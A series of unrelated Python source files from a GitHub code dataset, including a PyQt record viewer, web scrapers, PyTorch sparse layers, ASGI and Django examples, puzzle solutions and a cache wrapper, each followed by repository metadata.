QTreeWidgetItem([\"Group Type\", str(self.group.group_type)]),\n QTreeWidgetItem([\"Version\", str(self.group.version)]),\n QTreeWidgetItem([\"Start\", f\"{self.group.loc.start:08x}\"]),\n QTreeWidgetItem([\"End\", f\"0x{self.group.loc.end:08x}\"]),\n QTreeWidgetItem([\"Size\", f\"0x{self.group.loc.size:08x}\"]),\n ]\n )\n item.setExpanded(True)\n\n for child in self.group.children():\n if isinstance(child, Group):\n item = GroupChild(group=child)\n item.setText(0, child.type.decode(\"ascii\"))\n item.setText(2, child.get_friendly_label())\n item.setForeground(2, QtGui.QBrush(ColorPurple))\n self.group.file.io.seek(child.loc.end)\n self.viewer.details.addTopLevelItem(item)\n continue\n\n item = RecordChild(record=child)\n item.setText(0, child.type.decode(\"ascii\"))\n item.setText(1, f\"0x{child.form_id:08X}\")\n item.setToolTip(1, tr(\"GroupViewer\", \"Form ID\", None))\n item.setFont(1, monospace())\n item.setForeground(1, ColorOrange)\n\n if child.flags & RecordFlag.Deleted:\n item.setForeground(0, QtGui.QBrush(ColorRed))\n\n for field in child.fields():\n # As a special case, we pull up any EDID fields to the top\n # level of the tree as a label for the record.\n if field.type == b\"EDID\":\n with BytesIO(field.data) as data:\n io = BinaryReader(data)\n with io as edid:\n edid.cstring(\"name\")\n item.setText(2, edid.data[\"name\"])\n item.setToolTip(\n 2, tr(\"GroupViewer\", \"Editor ID\", None)\n )\n item.setForeground(\n 2,\n QtGui.QBrush(ColorPurple),\n )\n\n break\n\n self.viewer.details.addTopLevelItem(item)\n self.group.file.io.seek(child.loc.end)\n\n self.s.progressDone.emit()\n\n\nclass GroupViewer(Viewer):\n \"\"\"\n Displays a single group in a tree view.\n\n Uses a background thread to load the group and populate the tree without\n blocking the UI thread.\n \"\"\"\n\n def __init__(self, group: Group, working_area: QLayout):\n super().__init__(working_area=working_area)\n\n self.group = group\n self.file = group.file.file\n self.file.seek(0)\n self.group = dataclasses.replace(\n self.group, file=ESMContainer(self.file)\n )\n\n self.details = QTreeWidget(self)\n self.details.hide()\n self.details.setUniformRowHeights(True)\n self.details.setColumnCount(3)\n self.details.setHeaderLabels(\n (\n tr(\"GroupViewer\", \"Type\", None),\n tr(\"GroupViewer\", \"Form ID\", None),\n tr(\"GroupViewer\", \"EDID\", None),\n )\n )\n self.details.itemDoubleClicked.connect(self.on_item_double_clicked)\n\n loader = GroupLoaderThread(self, group)\n loader.s.progressStart.connect(\n self.on_loading_start, QtCore.Qt.QueuedConnection # noqa\n )\n loader.s.progressDone.connect(\n self.on_loading_complete, QtCore.Qt.QueuedConnection # noqa\n )\n QThreadPool.globalInstance().start(loader)\n\n self.layout.insertWidget(0, self.details)\n\n def on_loading_complete(self):\n super().on_loading_complete()\n self.details.show()\n\n def on_item_double_clicked(self, item: QTreeWidgetItem, column: int):\n self.open_item(item)\n\n def open_item(self, item: QTreeWidgetItem) -> Viewer | None:\n if isinstance(item, GroupChild):\n viewer = GroupViewer(item.group, self.working_area)\n self.add_panel(\"child\", viewer)\n return viewer\n elif isinstance(item, RecordChild):\n viewer = RecordViewer(item.record, self.working_area)\n self.add_panel(\"child\", viewer)\n return viewer\n\n def navigate(self, path: list[str]):\n pass\n","repo_name":"TkTech/starhopper","sub_path":"starhopper/gui/viewers/group_viewer.py","file_name":"group_viewer.py","file_ext":"py","file_size_in_byte":6004,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"8472001983","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 9 09:12:43 2015\n\n@author: drizardnicolas\n\"\"\"\nimport numpy as np\nfrom scipy import misc\n\nfrom KLmin import KLmin\nfrom dispresult import dispresult\nfrom patch_matching_color import patch_matching_color\n#from patch_matching_NB import patch_matching_NB\nfrom patch_matching_color_5parameters import patch_matching_color_5parameters\nfrom patch_matching_color_squareparameters import patch_matching_color_squareparameters\n\n####################################################################################################################################################################################################################################################################################################################################################################################################################\n#################TO DO:\n\n#Parameters to chose before running the program\npatchs_number=7\n\nimg_result='poupees_test_result.jpg'\nimg_source='img/group.jpg'\neye_source='img/face.png'\n\n#Zoom parameters\nzmin=0.8\nzmax=1.2\ndz=0.2\n\n####################################################################################################################################################################################################################################################################################################################################################################################################################\n\n#load images in fray-scale layer only for the size \nimg = misc.imread(img_source) \neye=misc.imread(eye_source)\n\n#data parameters\n\ni0=eye.shape[0]\nj0=eye.shape[1]\neye_size=i0*j0\n\n\ni1=img.shape[0]\nj1=img.shape[1]\n\n#-------------------------------Patch matching method\n#Method to chose among the following methods:\n# patch_matching_NB\n# patch_matching_color\n# patch_maching_color_5parameters\n# patch_matching_color_squareparameters\n\n[KL, pre_processing_time, patch_matching_time]=patch_matching_color(eye_source, img_source, zmin, zmax, dz)\n\n\n#-------------------------------Finding the top matchs_number patch(es) matching the eye patch in the img based on the KL table\n\n#KL_min stores the top patchs_number patch maching the input eye in the image img\n\nKL_min=KLmin(KL,i0,j0,i1,j1,patchs_number) \n\n#------------------------------Displaying and saving the result\n\n#aliasing img to conserve the original img\nimg_bis=np.zeros(img.shape)\n\nfor i in range(img.shape[0]):\n img_bis[i,:,:]=[row[:] for row in img[i,:,:]] \nimg_bis=img_bis.astype(np.uint8) \n\n#Displaying the result and saving it with the name img_result\ndispresult(img_result,img_bis,i0,j0,KL_min,patchs_number)\n","repo_name":"nicodri/Patch-Detection-in-Image","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"69820017973","text":"import requests\nimport concurrent.futures\n\n\ndef get_html(url):\n try:\n return requests.get(url).content.decode(\"utf-8\")\n except Exception as e:\n print(\"GET ERROR \" + url)\n print(e)\n pass\n\n\ndef write(filepath, content):\n try:\n if content is not None:\n with open(filepath, \"w\") as w:\n w.writelines(content)\n w.close()\n except Exception as e:\n print(\"WRITE ERROR \" + filepath)\n print(e)\n pass\n\n\ndef single_scrape(url, filepath=None):\n try:\n html = get_html(url)\n if len(html) > 0:\n if filepath:\n write(filepath, html)\n return html\n except Exception as e:\n print(e)\n\n\ndef multi_scrape(filepath_url_dict, parse_func=None):\n total = len(filepath_url_dict)\n with concurrent.futures.ThreadPoolExecutor() as executor:\n filepaths = filepath_url_dict.keys()\n future_to_url = {executor.submit(\n get_html, filepath_url_dict[fp]): fp for fp in filepaths}\n count = 0\n for future in concurrent.futures.as_completed(future_to_url):\n filepath = future_to_url[future]\n url = filepath_url_dict[filepath]\n try:\n data = future.result()\n except Exception as e:\n print('%r generated an exception: %s' % (url, e))\n else:\n # print('%r page is %d bytes' % (url, len(data)))\n html = data\n if html is not None and len(html) > 0:\n if parse_func is not None:\n content = parse_func(html)\n else:\n content = html\n write(filepath, content)\n\n count += 1\n print(\" %d/%d\" % (count, total), end=\"\\r\", flush=True)\n print(\"\")\n","repo_name":"avarant/webscraper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38183476995","text":"import math\nimport torch \nimport torch.nn as nn\n\n\"\"\"\nFunction for activation binarization\n\"\"\"\nclass WeightMaskStep(torch.autograd.Function):\n @staticmethod \n def forward(ctx, input):\n ctx.save_for_backward(input)\n return (input>0.).to(input.dtype)\n\n @staticmethod\n def backward(ctx, grad_output):\n input, = ctx.saved_tensors\n grad_input = grad_output.clone()\n zero_index = torch.abs(input) > 1\n middle_index = (torch.abs(input) <= 1) * (torch.abs(input) > 0.4)\n additional = 2-4*torch.abs(input)\n additional[zero_index] = 0.\n additional[middle_index] = 0.4\n return grad_input*additional\n\nclass SparseLinear(nn.Module):\n def __init__(self, in_features, out_features, bias=True):\n super(SparseLinear, self).__init__()\n self.in_features = in_features\n self.out_features = out_features \n self.weight = nn.Parameter(torch.Tensor(out_features, in_features))\n if bias:\n self.bias = nn.Parameter(torch.Tensor(out_features))\n else:\n self.register_parameter('bias', None)\n\n self.threshold = nn.Parameter(torch.Tensor(out_features))\n self.weight_mask = WeightMaskStep.apply\n #self.mask = None\n self.reset_parameters()\n\n\n def reset_parameters(self):\n nn.init.kaiming_uniform_(self.weight, a=math.sqrt(5))\n if self.bias is not None:\n fan_in, _ = nn.init._calculate_fan_in_and_fan_out(self.weight)\n bound = 1 / math.sqrt(fan_in)\n nn.init.uniform_(self.bias, -bound, bound) \n with torch.no_grad():\n #std = self.weight.std()\n self.threshold.data.fill_(0)\n \n def forward(self, input):\n abs_weight = torch.abs(self.weight)\n threshold = self.threshold.view(abs_weight.shape[0], -1)\n abs_weight = abs_weight-threshold\n mask = self.weight_mask(abs_weight)\n ratio = torch.sum(mask) / mask.numel()\n #print(\"keep ratio {:.2f}\".format(ratio))\n if ratio <= 0.01:\n with torch.no_grad():\n #std = self.weight.std()\n self.threshold.data.fill_(0)\n abs_weight = torch.abs(self.weight)\n threshold = self.threshold.view(abs_weight.shape[0], -1)\n abs_weight = abs_weight-threshold\n mask = self.weight_mask(abs_weight)\n masked_weight = self.weight * mask \n output = torch.nn.functional.linear(input, masked_weight, self.bias)\n return output\n def extra_repr(self) -> str:\n return 'in_features={}, out_features={}, bias={}'.format(\n self.in_features, self.out_features, self.bias is not None\n )\n \nclass SparseConv2d(nn.Module):\n def __init__(self, in_c, out_c, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True, padding_mode=\"zeros\"):\n super(SparseConv2d, self).__init__()\n self.in_channels = in_c \n self.out_channels = out_c\n self.kernel_size = kernel_size\n self.stride = stride \n self.padding = padding \n self.dilation = dilation\n self.groups = groups\n self.padding_mode = padding_mode\n\n ## define weight \n self.weight = nn.Parameter(torch.Tensor(\n out_c, in_c // groups, *kernel_size\n ))\n if bias:\n self.bias = nn.Parameter(torch.Tensor(out_c))\n else:\n self.register_parameter('bias', None)\n self.threshold = nn.Parameter(torch.Tensor(out_c))\n self.weight_mask = WeightMaskStep.apply\n self.reset_parameters()\n\n def reset_parameters(self):\n nn.init.kaiming_uniform_(self.weight, a=math.sqrt(5))\n if self.bias is not None:\n fan_in, _ = nn.init._calculate_fan_in_and_fan_out(self.weight)\n bound = 1 / math.sqrt(fan_in)\n nn.init.uniform_(self.bias, -bound, bound)\n with torch.no_grad():\n self.threshold.data.fill_(0.)\n\n def forward(self, x):\n weight_shape = self.weight.shape \n threshold = self.threshold.view(weight_shape[0], -1)\n weight = torch.abs(self.weight)\n weight = weight.view(weight_shape[0], -1)\n weight = weight - threshold\n mask = self.weight_mask(weight)\n mask = mask.view(weight_shape)\n ratio = torch.sum(mask) / mask.numel()\n # print(\"threshold {:3f}\".format(self.threshold[0]))\n # print(\"keep ratio {:.2f}\".format(ratio))\n if ratio <= 0.01:\n with torch.no_grad():\n self.threshold.data.fill_(0.)\n threshold = self.threshold.view(weight_shape[0], -1)\n weight = torch.abs(self.weight)\n weight = weight.view(weight_shape[0], -1)\n weight = weight - threshold\n mask = self.weight_mask(weight)\n mask = mask.view(weight_shape)\n masked_weight = self.weight * mask\n\n conv_out = torch.nn.functional.conv2d(x, masked_weight, bias=self.bias, stride=self.stride,\n padding=self.padding, dilation=self.dilation, groups=self.groups)\n return conv_out\n\n def extra_repr(self):\n s = ('{in_channels}, {out_channels}, kernel_size={kernel_size}'\n ', stride={stride}')\n if self.padding != (0,) * len(self.padding):\n s += ', padding={padding}'\n if self.dilation != (1,) * len(self.dilation):\n s += ', dilation={dilation}'\n if self.groups != 1:\n s += ', groups={groups}'\n if self.bias is None:\n s += ', bias=False'\n if self.padding_mode != 'zeros':\n s += ', padding_mode={padding_mode}'\n return s.format(**self.__dict__)\n\n def __setstate__(self, state):\n super(SparseConv2d, self).__setstate__(state)\n if not hasattr(self, 'padding_mode'):\n self.padding_mode = 'zeros'\n","repo_name":"IntelLabs/FP8-Emulation-Toolkit","sub_path":"mpemu/module_wrappers/adasparse.py","file_name":"adasparse.py","file_ext":"py","file_size_in_byte":5858,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"21"} +{"seq_id":"14717810934","text":"n = int(input())\ndata = list(map(int,input().split()))\n\ndata.sort()\n\ntarget = 1\nfor x in data:\n if target HttpResponse:\n \"\"\"Handle the GET request\"\"\"\n accept = header.find(b'accept', scope['headers'])\n if accept != b'application/json':\n return 500\n text = json.dumps(info)\n headers = [\n (b'content-type', b'application/json')\n ]\n return 200, headers, text_writer(text)\n\n\nasync def set_info(\n scope: Scope,\n info: Info,\n _matches: RouteMatches,\n content: Content\n) -> HttpResponse:\n \"\"\"Handle the POST request\"\"\"\n content_type = header.find(b'content-type', scope['headers'])\n if content_type != b'application/json':\n return 500\n text = await text_reader(content)\n data = json.loads(text)\n info.update(data)\n return 204\n\napp = Application(info={'name': 'Michael Caine'})\napp.http_router.add({'GET'}, '/info', get_info)\napp.http_router.add({'POST'}, '/info', set_info)\n\nconfig = Config()\nconfig.bind = [\"0.0.0.0:9009\"]\nasyncio.run(serve(app, config))\n","repo_name":"rob-blackbourn/bareASGI-tutorial","sub_path":"examples/simple_rest.py","file_name":"simple_rest.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1053358667","text":"\"\"\"Code Created by Amber Linnea Kirylak for Harvard CS50P class Lecture 7\"\"\"\nimport re\n\n#prompt user for email\nemail = input(\"What's your email? \").strip()\n\n#re.search(pattern, string, flags=0)\n\n#how to validate input so there is just an email but not a sentence.\n#sample input: My email address is malan@harvard.edu\nif re.search(\"^.+@.+\\.edu$\", email):\n print(\"Valid\")\nelse:\n print(\"Invalid\")\n\n'''\n^ matches the start of the string\n$ matches the end of the string or just before the new line at the end of the string\n'''","repo_name":"akirylak/python-practice","sub_path":"validate_regx4.py","file_name":"validate_regx4.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41246940637","text":"from django.db import IntegrityError, transaction\nfrom django.test import TestCase\nfrom users.models import User\nfrom django.core.exceptions import ValidationError\n\n\nclass UsersTest(TestCase):\n def test_create_user(self):\n self.assertEquals(0, User.objects.count())\n u = User.objects.create_user('foo', 'foo@gmail.com', 'secret')\n self.assertEquals(1, User.objects.count())\n\n self.assertRaisesRegexp(ValidationError, 'Nick', User.objects.create_user, 'Foo', 'bar@gmail.com', 'secret')\n\n with transaction.atomic():\n self.assertRaisesRegexp(IntegrityError, 'email', User.objects.create_user, 'bar', 'foo@gmail.com', 'secret')\n\n u = User.objects.create_user('bar', 'bar@gmail.com', 'secret')\n self.assertEquals(2, User.objects.count())\n\n","repo_name":"nonZero/community.hasadna.org.il","sub_path":"users/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73984928372","text":"import scrapy\nfrom olx.items import OlxItem\n\n\nclass QuotesSpider(scrapy.Spider):\n name = \"property\"\n allowed_domains = ['go.olx.com.br']\n\n def __init__(self, region, apartment, **kwargs):\n if region == \"\":\n self.start_urls = 'https://go.olx.com.br/imoveis'\n else:\n region.replace(\" \", \"-\")\n if apartment == \"True\":\n self.start_urls = [f'https://go.olx.com.br/grande-goiania-e-anapolis/{region}/imoveis/venda/apartamentos']\n else:\n self.start_urls = [f'https://go.olx.com.br/grande-goiania-e-anapolis/{region}/imoveis/venda/casas']\n\n def start_requests(self):\n headers= {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0'}\n for url in self.start_urls:\n yield scrapy.Request(url=url, headers=headers, callback=self.parse)\n \n def parse(self, response):\n headers= {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0'}\n last_page_link = response.css(\"div.sc-hmzhuo.hMZElg.sc-jTzLTM.iwtnNi > a::attr(href)\").extract()[0]\n last_page_number = int(last_page_link.split('?o=')[1])\n for page_number in range(2, last_page_number + 1):\n page_url = self.start_urls[0] + f'?o={page_number}'\n yield scrapy.Request(page_url, headers=headers, callback=self.parse_page)\n\n def parse_page(self, response):\n items = OlxItem()\n property_list = response.css(\".sc-1fcmfeb-2\")\n for property_item in property_list:\n items['href'] = property_item.css(\"a::attr(href)\").extract()\n content = property_item.css(\".fnmrjs-2.jiSLYe\")\n if content == []:\n print(\"\\n2\\n\")\n content = property_item.css(\"div.sc-12rk7z2-3.fqDYpJ\")\n items['title'] = content.css(\"div.sc-12rk7z2-5.fXzBqN > div >h2::attr(title)\").extract()\n items['text'] = content.css(\"div.sc-12rk7z2-6.bmfccv > div > div > span::text\").extract()\n items['price'] = content.css(\"div.sc-1kn4z61-1.hzqyCO > span::text\").extract()\n if len(items['price']) > 1:\n items['price'] = items['price'][0]\n date_hour = content.css(\".sc-11h4wdr-0.cHSTFT.sc-ifAKCX.cmFKIN::text\").extract()\n try:\n items['date'] = date_hour[0]\n except IndexError:\n items['date'] = \"\"\n try:\n items['hour'] = date_hour[1]\n except IndexError:\n items['hour'] = \"\"\n else:\n print(\"\\n1\\n\")\n items['title'] = content.css(\".fnmrjs-6.iNpuEh>div>h2::attr(title)\").extract()\n items['text'] = content.css(\"div.fnmrjs-6.iNpuEh>div>span::text\").extract()\n items['price'] = content.css(\"div.fnmrjs-7.erUydy > div.fnmrjs-9.gqfQzY > div > div > span::text\").extract()\n if len(items['price']) > 1:\n items['price'] = items['price'][0]\n date_hour = content.css(\"div.fnmrjs-7.erUydy > div.fnmrjs-10.gHqbSa > div > div > span::text\").extract()\n try:\n items['date'] = date_hour[0]\n except IndexError:\n items['date'] = \"\"\n try:\n items['hour'] = date_hour[1]\n except IndexError:\n items['hour'] = \"\"\n yield items","repo_name":"luizhenriquemaia/scrapy-olx","sub_path":"olx/spiders/property.py","file_name":"property.py","file_ext":"py","file_size_in_byte":3507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39170717935","text":"def readLines(fileName):\n\n with open(fileName) as f:\n return [line.rstrip() for line in f.readlines()]\n\ndef parseLines(lines):\n import re\n\n ops = []\n \n for l in lines:\n match = re.search('(acc|jmp|nop)\\s([+-])([\\d]+)', l)\n op, sign, value = match.groups()\n\n value = int(value) * -1 if sign == '-' else int(value)\n\n ops.append((op, value))\n\n return ops\n\n\ndef main():\n import sys\n\n lines = readLines('input')\n ops = parseLines(lines)\n\n\n for i in range(len(ops)):\n accumulator = 0\n currentPC = 0\n seenPC = set()\n\n while currentPC not in seenPC and currentPC < len(ops):\n seenPC.add(currentPC)\n\n # print('-', i, currentPC, len(ops), seenPC)\n op, value = ops[currentPC]\n\n if currentPC == i:\n if op == 'nop': op = 'jmp'\n elif op == 'jmp': op = 'nop'\n\n if op == 'nop':\n currentPC += 1\n elif op == 'acc':\n accumulator += value\n currentPC += 1\n elif op == 'jmp':\n currentPC += value\n\n if currentPC >= len(ops):\n # print(i, accumulator)\n sys.stdout.write(str(accumulator) + '\\n')\n return accumulator \n\nif __name__ == '__main__':\n main()","repo_name":"himohimo/advent-of-code-2020","sub_path":"day-8/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38503874911","text":"from processInputs import get_formatted_input\n\nWIDTH = 25\nHEIGHT = 6\n\n\ndef part1(data):\n imageData = str(data)\n pointer = 0\n minZeroes = 999999\n output = 0\n while pointer < len(imageData):\n digitCount = [0, 0, 0]\n for i in range(WIDTH * HEIGHT):\n currentPixel = imageData[pointer + i]\n digitCount[int(currentPixel)] += 1\n if digitCount[0] < minZeroes:\n minZeroes = digitCount[0]\n output = digitCount[1] * digitCount[2]\n pointer += WIDTH * HEIGHT\n return output\n\n\ndef part2(data):\n imageData = str(data)\n image = []\n for y in range(HEIGHT):\n row = \"\"\n for x in range(WIDTH):\n positionOffset = y * WIDTH + x\n topPixel = -1\n layerOffset = 0\n for z in range(len(imageData) // (WIDTH * HEIGHT)):\n pixel = imageData[positionOffset + layerOffset]\n if pixel != '2':\n topPixel = pixel\n break\n layerOffset += WIDTH * HEIGHT\n row += topPixel\n image.append(row)\n formattedImage = \"\\n\"\n for i in image:\n formattedImage += i.replace(\"1\", \"███\").replace(\"0\", \" \") + \"\\n\"\n return formattedImage\n\n\nINPUT = get_formatted_input(8)\nprint(part1(INPUT), part2(INPUT))\n","repo_name":"ComputahSaysNo/AOC_2019","sub_path":"8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40403795015","text":"import uuid\n\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy_utils import UUIDType, Timestamp\n\nfrom core.extensions import db\n\n\nColumn = db.Column\nrelationship = relationship\n\n\nclass CRUDMixin(object):\n @classmethod\n def create(cls, **kwargs):\n if issubclass(cls, SurrogatePK):\n unique_id = uuid.uuid4()\n if not kwargs.get(\"id\"):\n kwargs[\"id\"] = unique_id\n instance = cls(**kwargs)\n return instance.save()\n\n def update(self, commit=True, **kwargs):\n for attr, value in kwargs.items():\n setattr(self, attr, value)\n return commit and self.save(commit)\n\n def save(self, commit=True):\n db.session.add(self)\n if commit:\n db.session.commit()\n return self\n\n def delete(self, commit=True):\n db.session.delete(self)\n return commit and db.session.commit()\n\n\nclass SurrogatePK(object):\n \"\"\"A mixin that adds a surrogate UUID 'primary key' column named ``id`` to\n any declarative-mapped class.\"\"\"\n\n __table_args__ = {\"extend_existing\": True}\n\n id = db.Column(UUIDType(binary=False), primary_key=True)\n\n\nclass Model(CRUDMixin, db.Model, Timestamp, SurrogatePK):\n __abstract__ = True\n\n @classmethod\n def exists(cls, ent_id):\n result = cls.query.get(ent_id)\n return result is not None\n","repo_name":"Turall/flask-rest-boilerplate","sub_path":"database/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"9815277692","text":"# Prompts the user for an integer N and finds all perfect numbers up to N.\n# Quadratic complexity, can deal with small values only.\n\n\nimport sys\n\n# Insert your code here\n\ntry:\n nb=int(input('Input an integer: '))\nexcept ValueError:\n print('Incorrect input, giving up.')\n sys.exit()\ndef isperfect(n):\n sum=0\n for i in range(2,n+1):\n if n%i==0:\n sum += n/i\n if sum==n:\n return True\n else:\n return False\n\nfor i in range(1,nb+1):\n if isperfect(i):\n print(f'{i} is a perfect number.')","repo_name":"Jerenyaoyelu/Python-Programming---COMP9021","sub_path":"challenges/6/perfect.py","file_name":"perfect.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"72919092852","text":"class Node:\n def __init__(self, data, next=None):\n self.data = data\n self.next = next\n\nclass NodeMgmt:\n def __init__(self, data):\n self.head = Node(data)\n\n def add(self, data):\n if self.head == '':\n self.head = Node(data)\n else:\n node = self.head\n while node.next:\n node = node.next\n node.next = Node(data)\n\n def delete(self, data):\n if self.head == '':\n return None\n # 삭제할 Node가 self.head일 경우,\n if self.head.data == data:\n temp = self.head\n self.head = self.head.next\n del temp\n else:\n node = self.head\n while node.next: # 우선 self.head는 아니기 때문에 self.head.next부터 확인\n if node.next.data == data:\n temp = node.next\n node.next = node.next.next\n del temp\n else:\n node = node.next\n\n def desc(self):\n node = self.head\n while node:\n print(node.data)\n node = node.next \n\n# 노드 생성\nlinkedlist = NodeMgmt(0)\nlinkedlist.desc()\nfor i in range(1,10):\n linkedlist.add(i)\n# linkedlist.desc()\n# for i in range(1,10):\n# linkedlist.delete(i)\n# linkedlist.desc()\n","repo_name":"jeleedev/wecode26-study","sub_path":"Algorithm/jaewon/002_linked_list.py","file_name":"002_linked_list.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19769052581","text":"from databases import Database\nfrom app.models.models import UserList, MessageList, MessageCreate, User\nfrom typing import Optional\n\n\nclass BaseRepository:\n def __init__(self, db: Database) -> None:\n self.db = db\n\n\nclass UsersRepository(BaseRepository):\n\n async def get_all_users(self) -> Optional[UserList]:\n USERS_QUERY = \"\"\"\n SELECT * from messaging.users\n \"\"\"\n users = await self.db.fetch_all(query=USERS_QUERY)\n return UserList(users)\n\n async def get_user_by_name(self, user_name: str) -> Optional[User]:\n USERS_QUERY = \"\"\"\n SELECT * from messaging.users \n WHERE user_name = :user_name\n \"\"\"\n user = await self.db.fetch_one(query=USERS_QUERY, values={\"user_name\": user_name})\n if not user:\n return None\n return User(**user)\n\n\nclass MessagesRepository(BaseRepository):\n\n async def get_messages_user(self, user_id: id) -> MessageList:\n GET_MESSAGES_QUERY = \"\"\"\n SELECT * from messaging.messages \n WHERE created_at >= current_date - interval '30 days'\n AND (sender_id = :sender_id \n OR recipient_id = :recipient_id);\n \"\"\"\n messages = await self.db.fetch_all(query=GET_MESSAGES_QUERY,\n values={\"sender_id\": user_id, \"recipient_id\": user_id})\n return MessageList(messages)\n\n async def create_messages(self, message: MessageCreate) -> None:\n INSERT_MESSAGES_QUERY = \"\"\"\n INSERT INTO messaging.messages(\n sender_id,\n recipient_id,\n body,\n created_at,\n timestamp_sent\n ) VALUES (:sender_id, :recipient_id, :body, :created_at, :timestamp_sent)\n \"\"\"\n await self.db.fetch_one(query=INSERT_MESSAGES_QUERY, values=message.dict())\n","repo_name":"rdibari84/messaging_api","sub_path":"backend/app/db/repos.py","file_name":"repos.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18038349452","text":"import logging\n\nfrom pysolcache.MemoryCache import MemoryCache\nfrom pysolcache.RedisCache import RedisCache\n\nlogger = logging.getLogger(__name__)\n\n\nclass HighCache(object):\n \"\"\"\n A High cache, handling L1 (MemoryCache), L2 (RedisCache)\n Provided MemoryCache and RedisCache must be ready for start/stop.\n - Keys : str\n - Values : bytes\n \"\"\"\n\n def __init__(self,\n memory_cache,\n redis_cache):\n \"\"\"\n Constructor\n :param memory_cache: MemoryCache\n :type memory_cache: MemoryCache\n :param redis_cache: RedisCache\n :type redis_cache: RedisCache\n \"\"\"\n\n # Params\n self._memory_cache = memory_cache\n self._redis_cache = redis_cache\n\n if not isinstance(self._memory_cache, MemoryCache):\n raise Exception(\"MemoryCache required\")\n elif not isinstance(self._redis_cache, RedisCache):\n raise Exception(\"RedisCache required\")\n\n # Start\n self.start_cache()\n\n # Ok\n logger.info(\"Initialize : started\")\n\n # ========================================\n # START / STOP (LOCKED)\n # ========================================\n\n def start_cache(self):\n \"\"\"\n Start\n \"\"\"\n\n # Safer : start if required\n\n # noinspection PyProtectedMember\n s = self._memory_cache._is_started\n if not s:\n logger.warning(\"_memory_cache : _is_started=%s, forcing start_cache now\", s)\n self._memory_cache.start_cache()\n\n # noinspection PyProtectedMember\n s = self._redis_cache._is_started\n if not s:\n logger.warning(\"_redis_cache : _is_started=%s, forcing start_cache now\", s)\n self._redis_cache.start_cache()\n\n def __del__(self):\n \"\"\"\n Destructor\n \"\"\"\n\n self.stop_cache()\n\n def stop_cache(self):\n \"\"\"\n Stop\n \"\"\"\n\n # noinspection PyProtectedMember\n s = self._memory_cache._is_started\n if s:\n self._memory_cache.stop_cache()\n\n # noinspection PyProtectedMember\n s = self._redis_cache._is_started\n if s:\n self._redis_cache.stop_cache()\n\n # ========================================\n # GET\n # ========================================\n\n def get(self, key, l1=True, l2=True):\n \"\"\"\n Get from cache.\n :param key: Any key\n :type key: str\n :param l1: fetch from L1?\n :type l1: bool\n :param l2: fetch from L2?\n :type l2: bool\n \"\"\"\n\n if l1:\n v = self._memory_cache.get(key)\n if v:\n return v\n\n if l2:\n v = self._redis_cache.get(key)\n if v:\n return v\n\n return None\n\n def getex(self, key, l1=True, l2=True):\n \"\"\"\n Get from cache.\n :param key: Any key\n :type key: str\n :param l1: fetch from L1?\n :type l1: bool\n :param l2: fetch from L2?\n :type l2: bool\n :return tuple (bytes or None, integer 0 for miss, 1 for L1 hit, 2 for L2 hit)\n :rtype tuple\n \"\"\"\n\n if l1:\n v = self._memory_cache.get(key)\n if v:\n return v, 1\n\n if l2:\n v = self._redis_cache.get(key)\n if v:\n return v, 2\n\n return None, 0\n\n # ========================================\n # REMOVE\n # ========================================\n\n def remove(self, key, l1=True, l2=True):\n \"\"\"\n Remove a key from cache.\n :param key: Any key\n :type key: str\n :param l1: remove from L1?\n :type l1: bool\n :param l2: remove from L2?\n :type l2: bool\n \"\"\"\n\n if l1:\n self._memory_cache.remove(key)\n\n if l2:\n self._redis_cache.remove(key)\n\n # ========================================\n # PUT\n # ========================================\n\n def put(self, key, val, ttl_ms, l1=True, l2=True):\n \"\"\"\n Put in cache\n :param key: Any key\n :type key: str\n :param val: Any val\n :type val: bytes\n :param ttl_ms: Ttl in ms\n :type ttl_ms : int\n :param l1: put in L1?\n :type l1: bool\n :param l2: put in L2?\n :type l2: bool\n :return tuple bool,bool (true if cached in L1, true if cached in L2)\n :rtype tuple\n \"\"\"\n\n b_l1 = False\n b_l2 = False\n\n if l1:\n b_l1 = self._memory_cache.put(key, val, ttl_ms)\n if l2:\n b_l2 = self._redis_cache.put(key, val, ttl_ms)\n\n return b_l1, 